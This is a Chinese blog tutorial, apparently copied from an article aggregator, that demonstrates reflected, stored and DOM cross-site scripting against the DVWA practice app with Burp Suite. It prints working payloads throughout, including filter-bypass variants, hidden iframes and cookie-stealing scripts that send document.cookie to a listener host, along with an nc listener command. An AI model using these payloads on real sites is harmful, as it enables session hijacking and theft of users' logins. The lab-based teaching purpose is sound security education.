安全小菜鸡
跨站脚本攻击XSS演示(burpsuite)

XSS简介

跨站脚本攻击(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的
通过web站点漏洞，向客户端交付恶意脚本代码，实现对客户端的攻击，事件被触发的时候嵌入的JavaScript代码将会被执行
1。注入客户端脚本代码
2。盗取cookie
3。重定向
分为3类
1.反射型XSS
2.存储型XSS
3.DOM XSS
实验语句

这次实验是在DVWA上做的
下面的语句都能用于每一种XSS
**直接嵌入**


**元素事件**
 
 clik
 
 type 

****重定向****


<iframe>

**获取cookie**
<script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>
<script src='http://192.168.10.129/a.js'></script>
</code></pre> 
  <h1>反射型XSS</h1> 
  <p>又称为非持久性跨站点脚本攻击，它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。</p> 
  <p>获取cookie流程<br> 1.黑客向服务器发送一个cookie，服务器返回一个带有脚本的JS页面<br> 2.用户向黑客发送cookie值，黑客向用户发送带有脚本的url</p> 
  <p><a href="http://img.e-com-net.com/image/info8/0f6df72e408a4195b2da989ef5259892.png" target="_blank"><img src="http://img.e-com-net.com/image/info8/0f6df72e408a4195b2da989ef5259892.png" alt="跨站脚本攻击XSS演示(burpsuite)_第1张图片" width="1094" height="622" style="border:1px solid black;"></a><br> 重定向<br> 1和上面一样，然后重定向直接转向第三方网站</p> 
  <p><a href="http://img.e-com-net.com/image/info8/bdf3bea053f7455f80d3bfeedf570ce4.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/bdf3bea053f7455f80d3bfeedf570ce4.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第2张图片" width="650" height="348" style="border:1px solid black;"></a></p> 
  <p>1.<strong>初级low</strong><br> 源代码<br> <a href="http://img.e-com-net.com/image/info8/844978fdc0f4466abd62189ad549dc9f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/844978fdc0f4466abd62189ad549dc9f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第3张图片" width="554" height="289" style="border:1px solid black;"></a><br> 输入1后显示hello 1<br> <a href="http://img.e-com-net.com/image/info8/d6c6571713a44d10a5830a1a39ed7342.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d6c6571713a44d10a5830a1a39ed7342.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第4张图片" width="554" height="262" style="border:1px solid black;"></a></p> 
  <p><strong>直接嵌入</strong></p> 
  <pre><code><script>alert('xss')</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/c81b440609c349c39703b09c48c100fe.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c81b440609c349c39703b09c48c100fe.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第5张图片" width="554" height="226" style="border:1px solid black;"></a><br> 打开burpsuite抓包<br> 这里为发出的包，框内为我们填在框里的数据<br> <a href="http://img.e-com-net.com/image/info8/50bfa82566274b4083ca383d688bb0de.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/50bfa82566274b4083ca383d688bb0de.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第6张图片" width="554" height="408" style="border:1px solid black;"></a><br> 这里是回包，数据和发送包一样，说明存在XSS<br> <a href="http://img.e-com-net.com/image/info8/71822d47126c4d62bf05ee6988042110.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/71822d47126c4d62bf05ee6988042110.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第7张图片" width="554" height="408" style="border:1px solid black;"></a></p> 
  <p><strong>元素事件</strong></p> 
  <pre><code><body onload=alert('xss')>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/6fbfdd886de14192b4b3c80a210bdef7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/6fbfdd886de14192b4b3c80a210bdef7.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第8张图片" width="554" height="254" style="border:1px solid black;"></a></p> 
  <pre><code><a href=http://192.168.10.128>clik</a>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/835917a78c5542dea1ab829b69200aa3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/835917a78c5542dea1ab829b69200aa3.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第9张图片" width="554" height="248" style="border:1px solid black;"></a><br> 点击clik进入目标<br> <a href="http://img.e-com-net.com/image/info8/627d50182c6d4687a7095f51092d5bbd.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/627d50182c6d4687a7095f51092d5bbd.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第10张图片" width="554" height="414" style="border:1px solid black;"></a></p> 
  <pre><code><img src=http://192.168.10.128/a.jpg onerror=alert('xss2')>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7cb1898b3c494ea5b98bf7e5fab48700.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7cb1898b3c494ea5b98bf7e5fab48700.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第11张图片" width="554" height="218" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/6292a46db11242f893bf483c01aa922a.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/6292a46db11242f893bf483c01aa922a.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第12张图片" width="554" height="219" style="border:1px solid black;"></a></p> 
  <pre><code><a href=''onclick=alert('xss4')>type</a>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d1cf0b0427e9420caf012c3e7f749e63.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d1cf0b0427e9420caf012c3e7f749e63.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第13张图片" width="554" height="248" style="border:1px solid black;"></a><br> 点击type后弹出页面</p> 
  <p><a href="http://img.e-com-net.com/image/info8/66eb29fd88f342439b6a971d57687174.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/66eb29fd88f342439b6a971d57687174.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第14张图片" width="554" height="248" style="border:1px solid black;"></a><br> 抓包<br> 发送包<a href="http://img.e-com-net.com/image/info8/779a53e5d9b0459e94982e9ba6663870.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/779a53e5d9b0459e94982e9ba6663870.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第15张图片" width="554" height="387" style="border:1px solid black;"></a><br> 回包<a href="http://img.e-com-net.com/image/info8/4235ce3437d0413ca91e65c820b9b90f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/4235ce3437d0413ca91e65c820b9b90f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第16张图片" width="554" height="387" style="border:1px solid black;"></a></p> 
  <p><strong>重定向</strong><br> 重定向(Redirect)就是通过各种方法将各种网络请求重新定个方向转到其它位置(如:网页重定向、域名的重定向、路由选择的变化也是对数据报文经由路径的一种重定向)。</p> 
  <pre><code><script> window.location="http://www.baidu.com"</script>
</code></pre> 
  <p>输入后直接跳转至目标网址<br> <a href="http://img.e-com-net.com/image/info8/c284e8d75b454123b1fe22b1585ab047.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c284e8d75b454123b1fe22b1585ab047.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第17张图片" width="554" height="202" style="border:1px solid black;"></a></p> 
  <pre><code><script> window.location="http://192.168.10.128"</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/35f2ae609d4c429c858cf9a89d7e7a1b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/35f2ae609d4c429c858cf9a89d7e7a1b.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第18张图片" width="554" height="235" style="border:1px solid black;"></a><br> 点击type<br> <a href="http://img.e-com-net.com/image/info8/715108b532844befaa2e8bca98cf3c79.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/715108b532844befaa2e8bca98cf3c79.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第19张图片" width="554" height="319" style="border:1px solid black;"></a></p> 
  <pre><code><iframe src='http://192.168.10.129/a.jpg' height='0' width='0'><iframe>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/7d91e33d4343403ea200940c2b774f27.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7d91e33d4343403ea200940c2b774f27.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第20张图片" width="554" height="185" style="border:1px solid black;"></a><br> 使用Kali监听80端口</p> 
  <pre><code>nc -vnlp80
</code></pre> 
  <p>抓到数据<br> <a href="http://img.e-com-net.com/image/info8/e4267075b2d84d529e3e145ed03f9cdd.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/e4267075b2d84d529e3e145ed03f9cdd.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第21张图片" width="554" height="185" style="border:1px solid black;"></a></p> 
  <p>获取cookie</p> 
  <p>Cookie 用于存储 web 页面的用户信息。</p> 
  <h2>什么是 Cookie？</h2> 
  <p>Cookie 是一些数据, 存储于你电脑上的文本文件中。<br> 当 web 服务器向浏览器发送 web 页面时，在连接关闭后，服务端不会记录用户的信息。<br> Cookie 的作用就是用于解决 “如何记录客户端的用户信息”:<br> • 当用户访问 web 页面时，他的名字可以记录在 cookie 中。<br> • 在用户下一次访问该页面时，可以在 cookie 中读取用户访问记录</p> 
  <p>随意抓取一个包<br> 可以修改cookie把low修改为high<br> <a href="http://img.e-com-net.com/image/info8/7a65863f17b248d89df752d19b091a68.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7a65863f17b248d89df752d19b091a68.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第22张图片" width="554" height="303" style="border:1px solid black;"></a><br> 修改为high然后forward放过<br> <a href="http://img.e-com-net.com/image/info8/559a9394138548abae83d6f28c4de78f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/559a9394138548abae83d6f28c4de78f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第23张图片" width="554" height="304" style="border:1px solid black;"></a><br> 回到界面发现变成了high<br> <a href="http://img.e-com-net.com/image/info8/7c65d3b4394c49a6aacdf5969965906d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/7c65d3b4394c49a6aacdf5969965906d.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第24张图片" width="554" height="530" style="border:1px solid black;"></a><br> 说明了cookie数据的重要性</p> 
  <pre><code><script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>


<script src='http://192.168.10.129/a.js'></script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/5210db877bc94e5eb57e4c478d020a70.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/5210db877bc94e5eb57e4c478d020a70.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第25张图片" width="554" height="208" style="border:1px solid black;"></a><br> kali监听</p> 
  <p><a href="http://img.e-com-net.com/image/info8/ae0b60587ed445f88f910129e0057601.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ae0b60587ed445f88f910129e0057601.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第26张图片" width="554" height="162" style="border:1px solid black;"></a></p> 
  <p><strong>中级Medium</strong></p> 
  <p>源代码<br> <a href="http://img.e-com-net.com/image/info8/789bc62056ad437ab70d2776a416eeec.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/789bc62056ad437ab70d2776a416eeec.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第27张图片" width="554" height="314" style="border:1px solid black;"></a><br> 源代码中要过滤</p> 
  <p>1.将script中字幕改变大小写用来避免过滤</p> 
  <pre><code><Script>alert('xss')</script>>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/f7b206f1c2024a55b9588629bd7eb88b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f7b206f1c2024a55b9588629bd7eb88b.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第28张图片" width="554" height="227" style="border:1px solid black;"></a></p> 
  <p>2.<code>将script改为script<script></code></p> 
  <pre><code><script<script>>alert('xss')</script>>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/b4c43efadd6145dbb6348671cde962c7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b4c43efadd6145dbb6348671cde962c7.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第29张图片" width="554" height="241" style="border:1px solid black;"></a></p> 
  <pre><code>3.将script改为script script
<script script>alert('xss')</script>>

4.将script改为script ，后面加个空格
<script >alert('xss')</script>>
</code></pre> 
  <p>以上所有方式代码和初级一样只需把script转换一下就行<br> <a href="http://img.e-com-net.com/image/info8/56af9a5313c64c8c88d8736491d4353d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/56af9a5313c64c8c88d8736491d4353d.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第30张图片" width="554" height="250" style="border:1px solid black;"></a></p> 
  <h1>存储型XSS</h1> 
  <p>又称为持久型跨站点脚本，它一般发生在XSS攻击向量(一般指XSS攻击代码)存储在网站数据库，当一个页面被用户打开的时候执行。每当用户打开浏览器,脚本执行。持久的XSS相比非持久性XSS攻击危害性更大,因为每当用户打开页面，查看内容时脚本将自动执行。谷歌的orkut曾经就遭受到XSS。</p> 
  <p>获取cookie</p> 
  <p>1.黑客向服务器发送cookie 带脚本的JS语句，服务器返回一个JS页面<br> 2.用户访问服务器的时候服务器将带有脚本的JS页面发给用户，然后用户将数据cookie给了黑客</p> 
  <p><a href="http://img.e-com-net.com/image/info8/8119a0700eb84192992a2cf2a059a21c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/8119a0700eb84192992a2cf2a059a21c.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第31张图片" width="650" height="376" style="border:1px solid black;"></a><br> 重定向<br> 前面都一样，然后都跳转至第三方网站</p> 
  <p><a href="http://img.e-com-net.com/image/info8/bff7f08add4b41bd8cf850e5beef2b72.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/bff7f08add4b41bd8cf850e5beef2b72.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第32张图片" width="650" height="388" style="border:1px solid black;"></a></p> 
  <p>初级low<br> 源代码<br> <a href="http://img.e-com-net.com/image/info8/85a5bb8df0f5404f8d1fd2e8d037e516.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/85a5bb8df0f5404f8d1fd2e8d037e516.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第33张图片" width="554" height="182" style="border:1px solid black;"></a><br> 代码输入在name或者message都可以<br> 在name框内有字数限制，怎么破除这个字数限制呢<br> 在页面按F12跳出这个界面，点击左下角这个按钮</p> 
  <p><a href="http://img.e-com-net.com/image/info8/edf3138de2ec45a8b8a6fe40f222aaf5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/edf3138de2ec45a8b8a6fe40f222aaf5.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第34张图片" width="554" height="300" style="border:1px solid black;"></a><br> 将鼠标拖至name中，然后将数据最大字数maxlength数据改大即可，同样message也可以这样修改，不过页面刷新后又恢复重置<br> <a href="http://img.e-com-net.com/image/info8/e6e860396dfc45d2a6844adb2ff98d95.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/e6e860396dfc45d2a6844adb2ff98d95.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第35张图片" width="554" height="300" style="border:1px solid black;"></a></p> 
  <pre><code><script>alert('xss')</script>
</code></pre> 
  <p>代码输入在name或者message都可以<br> Message中随意填写<br> <a href="http://img.e-com-net.com/image/info8/504a03aa60a744a8a0b1f795bc0ed1a2.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/504a03aa60a744a8a0b1f795bc0ed1a2.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第36张图片" width="554" height="246" style="border:1px solid black;"></a><br> 存储型XSS每次进入该界面都会跳出该窗口</p> 
  <p>抓包<br> 看到了我们输入的数据和cookie<br> <a href="http://img.e-com-net.com/image/info8/f7c355b9aa0b43b88b24caed3915c567.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f7c355b9aa0b43b88b24caed3915c567.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第37张图片" width="554" height="387" style="border:1px solid black;"></a></p> 
  <p>想要取消每次的跳出去如图页面点击重置即可<br> <a href="http://img.e-com-net.com/image/info8/9800de1fd8634322ab08049737e94836.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9800de1fd8634322ab08049737e94836.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第38张图片" width="554" height="430" style="border:1px solid black;"></a></p> 
  <p><code><script>alert('xss')</script></code> name中随意填写<br> <a href="http://img.e-com-net.com/image/info8/fb5b5a2ddc994143ab98e93bd3f89ab9.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/fb5b5a2ddc994143ab98e93bd3f89ab9.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第39张图片" width="554" height="192" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/c5bfe44426164582a7410b2c25bc83ac.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c5bfe44426164582a7410b2c25bc83ac.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第40张图片" width="554" height="258" style="border:1px solid black;"></a></p> 
  <pre><code><a href=http://192.168.10.129>clik</a>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/c40db25cd9f446edab0bf40f96604f56.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c40db25cd9f446edab0bf40f96604f56.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第41张图片" width="554" height="316" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/ff28b8d1d68c44809f5213bb8f8a6bee.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ff28b8d1d68c44809f5213bb8f8a6bee.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第42张图片" width="554" height="333" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/ea5a2ca3994240fc8903b0a965740d75.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ea5a2ca3994240fc8903b0a965740d75.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第43张图片" width="554" height="411" style="border:1px solid black;"></a></p> 
  <pre><code><img src=http://192.168.10.128/a.jpg onerror=alert
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/4a97404f71d74aa7a169b156361eaa3d.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/4a97404f71d74aa7a169b156361eaa3d.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第44张图片" width="554" height="221" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/33c53c81ff904dda8f4025d5445cab8b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/33c53c81ff904dda8f4025d5445cab8b.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第45张图片" width="554" height="305" style="border:1px solid black;"></a></p> 
  <p>重定向</p> 
  <pre><code><script> window.location="http://www.baidu.com"</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/1419a57e56e9408c8413be9d82857ee2.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1419a57e56e9408c8413be9d82857ee2.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第46张图片" width="554" height="271" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/8a3171dd42614681bdc5a7f8094d89fb.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/8a3171dd42614681bdc5a7f8094d89fb.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第47张图片" width="554" height="279" style="border:1px solid black;"></a></p> 
  <pre><code><script> window.location="http://192.168.10.128"</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/e81a9ef8dd564013a8e622a131a5b31e.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/e81a9ef8dd564013a8e622a131a5b31e.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第48张图片" width="554" height="305" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/00ae5ffbcc5c49c9962074518ebb0c4f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/00ae5ffbcc5c49c9962074518ebb0c4f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第49张图片" width="554" height="478" style="border:1px solid black;"></a></p> 
  <pre><code><iframe src='http://192.168.10.129/a.jpg' height='0' width='0'><iframe>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/2d72ffa0c7954ff9b08169e3c2feaf20.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/2d72ffa0c7954ff9b08169e3c2feaf20.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第50张图片" width="554" height="258" style="border:1px solid black;"></a><br> kali监听<br> <a href="http://img.e-com-net.com/image/info8/4fe0a1331237482a98028067785e4c1f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/4fe0a1331237482a98028067785e4c1f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第51张图片" width="554" height="159" style="border:1px solid black;"></a><br> 下面跳出登录名和结果<br> <a href="http://img.e-com-net.com/image/info8/77f32f244be84837bf43caeb87aa0be6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/77f32f244be84837bf43caeb87aa0be6.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第52张图片" width="554" height="272" style="border:1px solid black;"></a><br> <strong>获取cookie</strong></p> 
  <pre><code><script>new lmage().src="http://192.168.10.129/c.php?output="+document.cookie;</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/89e24ea4c9144ce6acd4e0b0f29901db.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/89e24ea4c9144ce6acd4e0b0f29901db.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第53张图片" width="554" height="267" style="border:1px solid black;"></a><br> kali监听<br> <a href="http://img.e-com-net.com/image/info8/bcbf513cc6d6429c8c4733cb049b30dc.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/bcbf513cc6d6429c8c4733cb049b30dc.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第54张图片" width="554" height="144" style="border:1px solid black;"></a><br> 抓包</p> 
  <p><a href="http://img.e-com-net.com/image/info8/ce8a15d0f57c48a98cf55abeff958b08.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ce8a15d0f57c48a98cf55abeff958b08.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第55张图片" width="554" height="387" style="border:1px solid black;"></a></p> 
  <pre><code><script src='http://192.168.10.129/a.js'></script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d2e737e8a169471d816c4d8810ca9545.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d2e737e8a169471d816c4d8810ca9545.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第56张图片" width="554" height="221" style="border:1px solid black;"></a><br> kali监听<br> <a href="http://img.e-com-net.com/image/info8/8fbb733d4d484429a7de676a8ba533c5.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/8fbb733d4d484429a7de676a8ba533c5.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第57张图片" width="554" height="161" style="border:1px solid black;"></a></p> 
  <h1>DOM XSS</h1> 
  <p>基于DOM的XSS有时也称为type0XSS。当用户能够通过交互修改浏览器页面中的DOM(DocumentObjectModel)并显示在浏览器上时，就有可能产生这种漏洞，从效果上来说它也是反射型XSS。</p> 
  <p>源代码<br> <a href="http://img.e-com-net.com/image/info8/9ebb93a928ba402ab338ac376f8acd3f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/9ebb93a928ba402ab338ac376f8acd3f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第58张图片" width="462" height="290" style="border:1px solid black;"></a><br> 选择English<br> <a href="http://img.e-com-net.com/image/info8/79e1692e2cb04802bf2a31ad1b3fece0.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/79e1692e2cb04802bf2a31ad1b3fece0.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第59张图片" width="554" height="359" style="border:1px solid black;"></a><br> 发现url出最后多了english<br> <a href="http://img.e-com-net.com/image/info8/6ea9eebeb8ee430b8942925fd663ec9b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/6ea9eebeb8ee430b8942925fd663ec9b.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第60张图片" width="554" height="287" style="border:1px solid black;"></a><br> 在English最后添加语句<br> <a href="http://img.e-com-net.com/image/info8/ec4dc5b3c94b47dcbe0fe227b8dedf4f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ec4dc5b3c94b47dcbe0fe227b8dedf4f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第61张图片" width="554" height="266" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/5e863b079c6a41eeadc163b171cfeb5f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/5e863b079c6a41eeadc163b171cfeb5f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第62张图片" width="554" height="249" style="border:1px solid black;"></a></p> 
  <pre><code><script> window.location="http://www.baidu.com"</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/d173fe0159d046d2ba71929ebc7d60a7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d173fe0159d046d2ba71929ebc7d60a7.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第63张图片" width="554" height="300" style="border:1px solid black;"></a><br> 短暂延迟后跳转至百度<br> <a href="http://img.e-com-net.com/image/info8/53b5433e342a41318a4048c0b1ec36e0.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/53b5433e342a41318a4048c0b1ec36e0.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第64张图片" width="554" height="237" style="border:1px solid black;"></a></p> 
  <pre><code><script> window.location="http://192.168.10.128"</script>
</code></pre> 
  <p><a href="http://img.e-com-net.com/image/info8/b2a0f75a32cd4e42b68ec79c4e76728f.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/b2a0f75a32cd4e42b68ec79c4e76728f.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第65张图片" width="554" height="300" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/83895151e9fd48deab3d9c59c977dc2a.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/83895151e9fd48deab3d9c59c977dc2a.jpg" alt="跨站脚本攻击XSS演示(burpsuite)_第66张图片" width="554" height="414" style="border:1px solid black;"></a></p> 
 </div> 
</div>
                            </div>
                        </div>
                    </div>
                    <!--PC和WAP自适应版-->
                    <div id="SOHUCS" sid="1187288358854959104"></div>
                    <script type="text/javascript" src="/views/front/js/chanyan.js"></script>
                    <!-- 文章页-底部 动态广告位 -->
                    <div class="youdao-fixed-ad" id="detail_ad_bottom"></div>
                </div>
                <div class="col-md-3">
                    <div class="row" id="ad">
                        <!-- 文章页-右侧1 动态广告位 -->
                        <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_1"> </div>
                        </div>
                        <!-- 文章页-右侧2 动态广告位 -->
                        <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_2"></div>
                        </div>
                        <!-- 文章页-右侧3 动态广告位 -->
                        <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad">
                            <div class="youdao-fixed-ad" id="detail_ad_3"></div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="container">
        <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(跨站脚本攻击XSS演示(burpsuite))</h4>
        <div id="paradigm-article-related">
            <div class="recommend-post mb30">
                <ul class="widget-links">
                    <li><a href="/article/1950222345163567104.htm"
                           title="深入理解汇编语言子程序设计与系统调用" target="_blank">深入理解汇编语言子程序设计与系统调用</a>
                        <span class="text-muted">网安spinage</span>
<a class="tag" taget="_blank" href="/search/%E6%B1%87%E7%BC%96%E8%AF%AD%E8%A8%80/1.htm">汇编语言</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E6%B1%87%E7%BC%96/1.htm">汇编</a><a class="tag" taget="_blank" href="/search/%E7%AE%97%E6%B3%95/1.htm">算法</a>
                        <div>本文将全面解析汇编语言中子程序设计的核心技术以及系统调用的实现方法，涵盖参数传递的多种方式、堆栈管理、API调用等关键知识点，并提供实际案例演示。一、子程序设计：参数传递的艺术1.寄存器传参：高效简洁.386.modelflat,stdcalloptioncasemap:none.dataxdd5;定义变量ydd6sumdd?.code;函数定义：addxy1addxy1procpushebpmo</div>
                    </li>
                    <li><a href="/article/1950218314064130048.htm"
                           title="Java并发核心：线程池使用技巧与最佳实践！ | 多线程篇(五)" target="_blank">Java并发核心：线程池使用技巧与最佳实践！ | 多线程篇(五)</a>
                        <span class="text-muted">bug菌¹</span>
